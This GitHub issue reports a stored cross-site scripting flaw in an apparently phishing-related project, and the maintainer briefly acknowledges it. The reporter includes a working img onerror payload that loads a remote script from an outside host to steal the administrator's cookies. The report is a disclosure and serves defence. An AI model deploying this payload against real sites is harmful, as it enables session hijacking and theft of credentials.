Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS exists in the information,can get cookie #69

Closed
Assassins-white opened this issue Mar 15, 2020 · 1 comment
Closed

XSS exists in the information,can get cookie #69

Assassins-white opened this issue Mar 15, 2020 · 1 comment

Comments

@Assassins-white
Copy link

Assassins-white commented Mar 15, 2020

In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.

Insert XSS payload where the password is entered
image
XSS code is triggered when the administrator views the information
image
Use the following code to get a cookie.
<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">
image

@sanjinhub
Copy link

收到,等新版本

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants